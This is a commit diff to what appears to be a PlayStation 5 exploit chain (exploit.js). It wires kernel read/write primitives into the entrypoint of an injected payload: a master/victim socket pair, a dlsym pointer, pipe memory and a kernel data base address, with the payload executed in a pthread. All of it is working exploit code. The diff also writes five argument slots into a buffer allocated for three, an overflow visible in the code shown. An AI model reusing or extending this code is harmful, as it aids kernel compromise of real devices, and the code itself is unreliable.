Add payload entry args for kernel read/write

Cryptogenic · Cryptogenic · commit 3598eff092c8 · 2022-10-27T17:08:10.000-04:00
diff --git a/document/en/ps5/exploit.js b/document/en/ps5/exploit.js
@@ -1427,14 +1427,22 @@ async function userland() {
             // TODO: Dynamic / relocations
         }
 
+        let rwpair_mem              = p.malloc(0x8);
         let test_payload_store      = p.malloc(0x8);
         let pthread_handle_store    = p.malloc(0x8);
         let pthread_value_store     = p.malloc(0x8);
         let args                    = p.malloc(0x8 * 3);
 
-        p.write8(args.add32(0x00), dlsym_addr);         // arg1
-        p.write8(args.add32(0x08), pipe_mem);           // arg2
-        p.write8(args.add32(0x10), test_payload_store); // arg3
+        // Pass master/victim pair to payload so it can do read/write
+        p.write4(rwpair_mem.add32(0x00), master_sock);
+        p.write4(rwpair_mem.add32(0x04), victim_sock);
+
+        // Arguments to entrypoint
+        p.write8(args.add32(0x00), dlsym_addr);         // arg1 = dlsym fptr
+        p.write8(args.add32(0x08), pipe_mem);           // arg2 = int *pipe[2]
+        p.write8(args.add32(0x10), rwpair_mem);         // arg3 = int *rwpair[2]
+        p.write8(args.add32(0x18), data_base_addr);     // arg4 = uint64_t kdata_base
+        p.write8(args.add32(0x20), test_payload_store); // arg5 = out buffer
 
         // Execute payload in pthread
         await log("  [+] Executing!");
